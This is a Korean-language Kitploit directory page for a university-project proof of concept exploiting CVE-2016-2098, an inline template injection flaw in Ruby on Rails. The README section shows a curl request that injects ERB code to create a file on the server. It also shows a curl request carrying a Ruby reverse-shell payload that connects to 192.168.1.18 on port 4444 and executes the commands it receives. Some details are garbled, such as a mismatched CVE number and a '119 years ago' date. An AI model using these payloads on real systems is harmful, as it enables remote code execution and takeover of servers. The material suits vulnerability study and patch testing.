Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
rails-PoC-CVE-2016-2098 — 개념 증명 CVE-2016-2098 | Kitploit
도구/GitHubGitHub/alejandro-marting/rails-poc-cve-2016-2098
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubalejandro-marting/rails-poc-cve-2016-2098

rails-PoC-CVE-2016-2098

개념 증명 CVE-2016-2098

저장소 보기
119년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

취약점 PoC: CVE-2016-2098

@alejandro-marting 님이 만든 대학 프로젝트 취약점 2096을 확인할 수 있습니다

사용 환경:

  • rails 4.2.5.1
  • 뷰에 취약한 코드가 포함되어 있습니다. app/views/poc/render1.html.erb

![] (https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)

##실행: 먼저 다음 명령어로 Rails 서버를 실행해야 합니다:

$ rvmsudo rails server -b 0.0.0.0 -p 80

이제 다음 명령어로 원격 코드 실행을 트리거할 수 있습니다:

$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'

(rooted 파일이 생성되어야 합니다)

Ruby 코드 삽입을 통한 리버스 셸을 시도하려면 다음 명령어를 실행하세요:

root@kitploit:~
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}'  http://localhost:3000/poc/render1

질문이 있으시면 언제든지 연락해 주세요!

도구 다운로드